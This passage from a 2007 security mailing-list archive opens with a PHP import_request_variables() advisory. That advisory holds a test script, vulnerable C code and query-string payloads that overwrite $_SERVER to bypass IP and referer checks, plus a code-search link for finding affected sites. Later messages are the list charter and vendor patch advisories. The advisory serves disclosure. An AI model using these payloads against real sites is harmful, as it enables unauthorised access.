crash and/or memory corruption. (Ilia) [/quote] Use the following test suite: run the script in a writable directory inside a document root then point your browser to the test.php files and make your tests. --- >8 --- >8 --- >8 --- >8 --- testsuite.sh --- >8 --- >8 --- >8 --- >8 #!/bin/bash mkdir hack-php_import_request_variables && cd hack-php_import_request_variables echo "Testing cli.." echo "register_globals = Off" > php-ini-globals-off php -c php-ini-globals-off -r "echo (int)ini_get("register_globals");" echo "register_globals = On" > php-ini-globals-on php -c php-ini-globals-on -r "echo (int)ini_get("register_globals");" echo "Testing mod.." mkdir globals-on && mkdir globals-off cat > globals-on/test.php << TOKEN 
GET'."n"; print_r(\$_GET);
echo '
POST
'."n"; print_r(\$_POST);
echo '
COOKIE
'."n"; print_r(\$_COOKIE);
echo '
SERVER
'."n"; print_r(\$_SERVER);
echo '
SESSION
'."n"; print_r(\$_SESSION);
echo '
FILES
'."n"; print_r(\$_FILES);
?>
TOKEN cp globals-on/test.php globals-off/test.php echo "php_value register_globals on" > globals-on/.htaccess echo "php_value register_globals off" > globals-off/.htaccess --- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8 Suggested tests are: - test.php?_SERVER=string (overwrite $_SERVER array and make it a string) - test.php?_SERVER[REMOTE_ADDR]=bypass client ip validation - test.php?_SERVER[HTTP_REFERER]=bypass referer validation Etc.. Add your POST/COOKIE/FILES probes. The vulnerable code is in the following files: ./ext/standard/basic_functions.c:PHP_FUNCTION(import_request_variables) ./Zend/zend_hash.c:ZEND_API void zend_hash_apply_with_arguments(HashTable *ht, apply_func_args_t apply_func, int num_args, ...) Vulnerable code snippet: PHP_FUNCTION(import_request_variables) { [..] if (prefix_len == 0) { php_error_docref(NULL TSRMLS_CC, E_NOTICE, "No prefix specified - possible security hazard"); } [..] for (p = types; p && *p; p++) { switch (*p) { case 'g': case 'G': zend_hash_apply_with_arguments(Z_ARRVAL_P(PG(http_globals)[TRACK_VARS_GET]), (apply_func_args_t) copy_request_variable, 2, prefix, prefix_len);break; case 'p': case 'P': zend_hash_apply_with_arguments(Z_ARRVAL_P(PG(http_globals)[TRACK_VARS_POST]), (apply_func_args_t) copy_request_variable, 2, prefix, prefix_len); zend_hash_apply_with_arguments(Z_ARRVAL_P(PG(http_globals)[TRACK_VARS_FILES]), (apply_func_args_t) copy_request_variable, 2, prefix, prefix_len); break; case 'c': case 'C': zend_hash_apply_with_arguments(Z_ARRVAL_P(PG(http_globals)[TRACK_VARS_COOKIE]), (apply_func_args_t) copy_request_variable, 2, prefix, prefix_len);break; } } [..] } As you can see there are different entry points but the "output" is the global scope. --- >8 --- >8 --- >8 --- >8 --- example.php --- >8 --- >8 --- >8 --- >8 --- >8 --- >8 --- >8 --- >8 --- ----------- --- >8 --- >8 --- >8 --- >8 curl http://URL/example.php?_SERVER[REMOTE_ADDR]=10.1.1.1 Will give you: Hello admin! Now that this is disclosed probably you would consider this url: http://www.google.com/codesearch?q=lang%3Aphp+import_request_variables IV. DETECTION All the PHP versions >=4.0.7 <=5.2.1 are vulnerable. V. WORKAROUND Dunno. VI. VENDOR RESPONSE Will fix, probably. VII. CVE INFORMATION No CVE at this time. VIII. DISCLOSURE TIMELINE 20060301 Discovery 20060302 Private testing 20060304 Tea time 20060305 Snowboard lesson 20060308 Full disclosure IX. CREDIT Stefano di Paola is credited with the discovery of this vulnerability. X. LEGAL NOTICES Copyright (c) 2007 Stefano di Paola Note: this exploit is DOUBLE LICENSED, 1. if you'll use it for personal and non-profit purposes you can apply GPL v2 and above. 2. In the case you plain to: a. use our code in any commercial context b. implement this code in your non-GPL application c. use this code during a Penetration Test d. make any profit from it you need to contact me in order to obtain a _commercial license_. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without my express written consense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -- ...oOOo...oOOo.... Stefano Di Paola Software & Security Engineer Web: www.wisec.it .................. From ascii at katamail.com Fri Mar 9 00:11:28 2007 From: ascii at katamail.com (ascii) Date: Fri, 09 Mar 2007 01:11:28 +0100 Subject: [Full-disclosure] PHP import_request_variables() vs extract() Message-ID: <45F0A630.1000804@katamail.com> Please note that also extract() will override any variable exluded $GLOBALS but the main difference is that on http://it2.php.net/extract you are advised to do not use "extract() against untrusted data, like user-input ($_GET, ...)." [quote] if you want to run old code that relies on register_globals temporarily, make sure you use one of the non-overwriting extract_type values such as EXTR_SKIP and be aware that you should extract in the same order that's defined in variables_order within the php.ini [/quote] Infact extract() has a EXTR_SKIP flag that implement this bhreaviuw: [quote] If there is a collision, don't overwrite the existing variable. [/quote] Using extract() with EXTR_SKIP will give you something like GLOBALS ON that is safe if compared with what happens using extract($_GET); or import_request_variables('G'); --- >8 --- >8 --- >8 --- >8 --- test1.php --- >8 --- >8 --- >8 --- >8 --- >8 --- >8 --- >8 --- >8 --- --------- --- >8 --- >8 --- >8 --- >8 Demo: test1.php?SERVER=abc Expected result: the _SERVER array will became a string The morale is that while an insecure usage of extract() by a developer could be his fault there is no secure usage of import_request_variables() and this is surely a PHP fault. Regards, Francesco 'ascii' Ongaro http://www.ush.it/ From johnc at grok.org.uk Fri Mar 9 01:21:28 2007 From: johnc at grok.org.uk (John Cartwright) Date: Fri, 9 Mar 2007 01:21:28 +0000 Subject: [Full-disclosure] List Charter Message-ID: <20070309012128.GA20963@grok.org.uk> [Full-Disclosure] Mailing List Charter John Cartwright - Introduction & Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia. - Subscription Information - Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-request at lists.grok.org.uk, send the word 'help' in either the message subject or body for details. - Moderation & Management - The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/. - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. - Posting Guidelines - The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclosure at lists.grok.org.uk. Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. - Charter Additions/Changes - The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a concensus has been reached. From ktriv3di at msn.com Fri Mar 9 02:21:03 2007 From: ktriv3di at msn.com (Justin Boem) Date: Thu, 8 Mar 2007 18:21:03 -0800 Subject: [Full-disclosure] Good resources on Web 2.0 Message-ID: List, I am looking for some good resources on Web 2.0 and Security. I know this is a huge topic, but any references to good books, articles, websites, tools, etc would be great Thanks -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070308/5f314a64/attachment.html From michaelslists at gmail.com Fri Mar 9 02:38:21 2007 From: michaelslists at gmail.com (Michael Silk) Date: Fri, 9 Mar 2007 13:38:21 +1100 Subject: [Full-disclosure] Good resources on Web 2.0 In-Reply-To: References: Message-ID: <5e01c29a0703081838i1eda7c21q203e34f35f17786a@mail.gmail.com> On 3/9/07, Justin Boem wrote: > > List, > > I am looking for some good resources on Web 2.0 and Security. I know this > is a huge topic, but any references to good books, articles, websites, > tools, etc would be great > "web 2.0" security is the same as any other type of web security. the same principles apply. Thanks > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- mike 00110001 <3 00110111 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070309/daf8dd01/attachment.html From kees at ubuntu.com Fri Mar 9 02:39:34 2007 From: kees at ubuntu.com (Kees Cook) Date: Thu, 8 Mar 2007 18:39:34 -0800 Subject: [Full-disclosure] [USN-433-1] Xine vulnerability Message-ID: <20070309023934.GR6805@outflux.net> =========================================================== Ubuntu Security Notice USN-433-1 March 09, 2007 xine-lib vulnerability CVE-2007-1246 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: libxine1c2 1.0.1-1ubuntu10.8 Ubuntu 6.06 LTS: libxine-main1 1.1.1+ubuntu2-7.6 Ubuntu 6.10: libxine1 1.1.2+repacked1-0ubuntu3.3 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Moritz Jodeit discovered that the DMO loader of Xine did not correctly validate the size of an allocated buffer. By tricking a user into opening a specially crafted media file, an attacker could execute arbitrary code with the user's privileges. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.8.diff.gz Size/MD5: 12146 b32c486037c9bd487f47677d77057aad http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.8.dsc Size/MD5: 1187 e4c778b992408ec8e46e5500921545af http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1.orig.tar.gz Size/MD5: 7774954 9be804b337c6c3a2e202c5a7237cb0f8 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.8_amd64.deb Size/MD5: 109296 92a59b50d859f12affc42fee457ed93f http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.8_amd64.deb Size/MD5: 3611908 9e6f2c0dad7b1050a71d1f29d3537ec1 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.8_i386.deb Size/MD5: 109306 3224a1a8c0c259b90add235d58d10a7a http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.8_i386.deb Size/MD5: 4005002 81fd17d5eabfa12a3dea0d9c8fd79d7f powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.8_powerpc.deb Size/MD5: 109320 eb1a5685b7288b8cc9ef6ae09d422aec http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.8_powerpc.deb Size/MD5: 3850506 7801ba1b96b888c38b4e72f8fb4ccee1 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.8_sparc.deb Size/MD5: 109312 22805f01c94ced268bd12cf951447af4 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.8_sparc.deb Size/MD5: 3695682 e0fbc0aa0791685943a5094ea6519b2d Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.6.diff.gz Size/MD5: 19845 149027147eff0f72e1d0af9faa0cd6cf http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.6.dsc Size/MD5: 1113 6fdbc64e22ad7511a80cba1ea840b534 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2.orig.tar.gz Size/MD5: 6099365 5d0f3988e4d95f6af6f3caf2130ee992 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.6_amd64.deb Size/MD5: 115856 6146578aeeecdf61742b90dca3a97155 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.6_amd64.deb Size/MD5: 2615268 a6cff8bccebfbe51d7b3a6916d9250b1 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.6_i386.deb Size/MD5: 115852 6b404dc405aefcac89ec3eec339f25a0 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.6_i386.deb Size/MD5: 2934402 ea3a45814952437ac9f792cf1e7586b3 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.6_powerpc.deb Size/MD5: 115860 1484daaeb0459a88c1760a1330397e52 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.6_powerpc.deb Size/MD5: 2724986 889c6b454382dd63cd89020c87faf547 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.6_sparc.deb Size/MD5: 115860 b43491e3060c813b3530664cca2acd30 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.6_sparc.deb Size/MD5: 2591802 1e116a509bfd2b93588c48f665b78055 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.2+repacked1-0ubuntu3.3.diff.gz Size/MD5: 71537 8eb0120c16f4a7fa6a104906b453f51a http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.2+repacked1-0ubuntu3.3.dsc Size/MD5: 1445 0a0fb0af663abf737e59cb67099e45ef http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.2+repacked1.orig.tar.gz Size/MD5: 4583422 9c05a6397838e4e2e9c419e898e4b930 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine-main1_1.1.2+repacked1-0ubuntu3.3_all.deb Size/MD5: 39034 4df368ac302eb48b666e8324529fa056 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.2+repacked1-0ubuntu3.3_amd64.deb Size/MD5: 118968 17df05fc2764c33e4ba5615cf8962c2a http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.2+repacked1-0ubuntu3.3_amd64.deb Size/MD5: 3442878 b4a5d4fc2bcd737cf0b63d8d3a1ad4b1 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.2+repacked1-0ubuntu3.3_amd64.deb Size/MD5: 2914566 91c324fe56add73266c33cbf38bc4536 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.2+repacked1-0ubuntu3.3_i386.deb Size/MD5: 118966 7c3bf270fba86dee9af4830cf36f41c8 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.2+repacked1-0ubuntu3.3_i386.deb Size/MD5: 3772104 b85545a9e2aa6b60165d4bd76c8057d3 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.2+repacked1-0ubuntu3.3_i386.deb Size/MD5: 3222286 14d569c60f5ffcd329ff5d9069ede6d9 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.2+repacked1-0ubuntu3.3_powerpc.deb Size/MD5: 118974 a43b661831de4510c30f1c0b96bbfa66 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.2+repacked1-0ubuntu3.3_powerpc.deb Size/MD5: 3469556 e27b2c49a649493bc9a93919475af667 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.2+repacked1-0ubuntu3.3_powerpc.deb Size/MD5: 3043210 a4cca521e0eff186d3c19a6c96eba3ce sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.2+repacked1-0ubuntu3.3_sparc.deb Size/MD5: 118978 c993d877a95c8e0a48d610b4883cf9e2 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.2+repacked1-0ubuntu3.3_sparc.deb Size/MD5: 3136598 57d6199ddad2e55bb5d7c0673c7ed5a2 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.2+repacked1-0ubuntu3.3_sparc.deb Size/MD5: 2857016 c79d6bac788a4c0fe262ada727b42c60 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070308/b1c56f47/attachment.bin From James.Williams at ca.com Fri Mar 9 02:59:23 2007 From: James.Williams at ca.com (Williams, James K) Date: Thu, 8 Mar 2007 21:59:23 -0500 Subject: [Full-disclosure] [CAID 35145]: CA eTrust Admin Privilege Escalation Vulnerability Message-ID: <649CDCB56C88AA458EFF2CBF494B6204025C4EC1@USILMS12.ca.com> Title: [CAID 35145]: CA eTrust Admin Privilege Escalation Vulnerability CA Vuln ID (CAID): 35145 CA Advisory Date: 2007-03-08 Impact: Attackers can gain escalated privileges. Summary: The CA eTrust Admin GINA component contains a privilege escalation vulnerability within the reset password interface. Mitigating Factors: This vulnerability is exploitable only through physical interactive access or through Remote Desktop. Severity: CA has given this vulnerability a Medium risk rating. Affected Products: eTrust Admin 8.1 SP2 (8.1.2) eTrust Admin 8.1 SP1 (8.1.1) eTrust Admin 8.1 (8.1.0) Affected Platforms: Windows Status and Recommendation: CA has issued an update to correct the vulnerability. Two update options are available for CA eTrust Admin 8.1 SP2 (8.1.2), 8.1 SP1 (8.1.1), 8.1 (8.1.0): 1. Uninstall GINA and install 8.1 SP2 CR6 or later. Or 2. Manually replace the affected cube.exe executable with the fixed cube.exe executable from the 8.1 SP2 CR6 Manual Updates zip file. The fixed cube.exe file has a date of February 11, 2007 and a file size of 53,248 bytes. Both updates can be found at the eTrust Admin Solutions and Patches page: http://supportconnectw.ca.com/public/etrust/etrustadmin-dmo/downloads/etrustadmin-updates.asp Workaround: If patch application is not feasible at this time, ensure that Remote Desktop is disabled and restrict physical host access to reduce exposure. How to determine if the installation is affected: 1. Using Windows Explorer, locate the file "cube.exe". By default, the file is located in the "C:\Program Files\CA\eTrust Admin GINA Option" directory. 2. Right click on the file and select Properties. 3. Select the General tab. The installation is vulnerable if the creation date of cube.exe is earlier than February 11, 2007. References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ CA SupportConnect security notice for this vulnerability: Security Notice for CA eTrust Admin GINA http://supportconnectw.ca.com/public/etrust/etrustadmin-dmo/infodocs/etrust_secnot_gina.asp CA Security Advisor posting: CA eTrust Admin Privilege Escalation Vulnerability http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=101038 CAID: 35145 CAID advisory link: http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=35145 CVE Reference: CVE-2007-1345 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1345 OSVDB Reference: OSVDB ID: 32722 http://osvdb.org/32722 Changelog for this advisory: v1.0 - Initial Release Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com. For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com. If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research CA, One CA Plaza. Islandia, NY 11749 Contact http://www3.ca.com/contact/ Legal Notice http://www3.ca.com/legal/ Privacy Policy http://www3.ca.com/privacy/ Copyright (c) 2007 CA. All rights reserved. From kees at ubuntu.com Fri Mar 9 04:24:37 2007 From: kees at ubuntu.com (Kees Cook) Date: Thu, 8 Mar 2007 20:24:37 -0800 Subject: [Full-disclosure] [USN-434-1] Ekiga vulnerability Message-ID: <20070309042437.GS6805@outflux.net> =========================================================== Ubuntu Security Notice USN-434-1 March 09, 2007 ekiga, gnomemeeting vulnerability CVE-2007-0999 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: gnomemeeting 1.2.2-1ubuntu1.2 Ubuntu 6.06 LTS: ekiga 2.0.1-0ubuntu6.2 Ubuntu 6.10: ekiga 2.0.3-0ubuntu3.2 After a standard system upgrade you need to restart Ekiga or reboot your computer to effect the necessary changes. Details follow: It was discovered that Ekiga had format string vulnerabilities beyond those fixed in USN-426-1. If a user was running Ekiga and listening for incoming calls, a remote attacker could send a crafted call request, and execute arbitrary code with the user's privileges. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.2.diff.gz Size/MD5: 13935 390ded46c12911e6ff7f0fb0b41648b1 http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.2.dsc Size/MD5: 1811 bfaea7c58d0be1c76fb15275584929d8 http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2.orig.tar.gz Size/MD5: 6059950 65fe2d6a31e63a37c5a6217206223192 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.2_amd64.deb Size/MD5: 1826502 ab68c7c0c54d6ea2288058f1cd850e0a i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.2_i386.deb Size/MD5: 1802224 2323471938830841421f5758518444a0 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.2_powerpc.deb Size/MD5: 1817578 61f4574c015fb133a7d223d68945ad87 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/g/gnomemeeting/gnomemeeting_1.2.2-1ubuntu1.2_sparc.deb Size/MD5: 1803946 ab636f2081b328f36025e99cea2f0cd3 Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.2.diff.gz Size/MD5: 26736 820ab04b4cb0423bb9d62f03bf3e4634 http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.2.dsc Size/MD5: 2090 921caa6df4e1ceeb79438b5f653992c6 http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1.orig.tar.gz Size/MD5: 5572709 9f0a2bcce380677e38b23991320df171 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.2_amd64.deb Size/MD5: 3687974 428c44b190d3e1e6f97f8d3be08aa6fe i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.2_i386.deb Size/MD5: 3658256 2b4c80838f881af9780e65e5be79b26b powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.2_powerpc.deb Size/MD5: 3673874 44119593cb37df9ae0c759df26e9f5b3 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.1-0ubuntu6.2_sparc.deb Size/MD5: 3661004 85ce6c1bc136e1e6699cfb501d537abd Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.2.diff.gz Size/MD5: 27205 ae82839a944aa39b118b1fa6edda3f1c http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.2.dsc Size/MD5: 1837 90fa46619ab136f7e8d7086916c1bdc0 http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3.orig.tar.gz Size/MD5: 5749938 5ad3458d73d65c6502c312ff0c430a7c amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.2_amd64.deb Size/MD5: 3689026 82e52fe078d8ab0102bf647d12cfe4cc i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.2_i386.deb Size/MD5: 3668638 4ebd1951ef9e4cc4860223e682c90541 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.2_powerpc.deb Size/MD5: 3676386 efcac25a055bb4cd5e776550c370880f sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/e/ekiga/ekiga_2.0.3-0ubuntu3.2_sparc.deb Size/MD5: 3671020 41fda4e546004b1a7f456b286e2ce560 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070308/34ebbc69/attachment.bin From security at mandriva.com Fri Mar 9 04:34:49 2007 From: security at mandriva.com (security at mandriva.com) Date: Thu, 08 Mar 2007 21:34:49 -0700 Subject: [Full-disclosure] [ MDKSA-2007:058 ] - Updated ekiga packages fix string vulnerabilities. Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2007:058 http://www.mandriva.com/security/ _______________________________________________________________________ Package : ekiga Date : March 8, 2007 Affected: 2007.0 _______________________________________________________________________ Problem Description: A format string flaw was discovered in how ekiga processes certain messages, which could permit a remote attacker that can connect to ekiga to potentially execute arbitrary code with the privileges of the user running ekiga. This is similar to the previous CVE-2007-1006, but the original evaluation/patches were incomplete. Updated package have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0999 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: f1864ecddf6bd6f89ca97ae2f62e102a 2007.0/i586/ekiga-2.0.3-1.2mdv2007.0.i586.rpm 6553d806ec25e8e7b3bf954d0522f126 2007.0/SRPMS/ekiga-2.0.3-1.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: d1044e6da6359f45c05b5b9633eb9b3e 2007.0/x86_64/ekiga-2.0.3-1.2mdv2007.0.x86_64.rpm 6553d806ec25e8e7b3bf954d0522f126 2007.0/SRPMS/ekiga-2.0.3-1.2mdv2007.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF8LmWmqjQ0CJFipgRAoxqAKCGqGz5vPwbGLM8dIhVGu3aTC/0pQCZAZ5t 4tj/XeqT0NKpu3t3MRu8tYs= =bmdD -----END PGP SIGNATURE----- From security at mandriva.com Fri Mar 9 04:53:11 2007 From: security at mandriva.com (security at mandriva.com) Date: Thu, 08 Mar 2007 21:53:11 -0700 Subject: [Full-disclosure] [ MDKSA-2007:059 ] - Updated gnupg packages provide enhanced forgery detection Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2007:059 http://www.mandriva.com/security/ _______________________________________________________________________ Package : gnupg Date : March 8, 2007 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 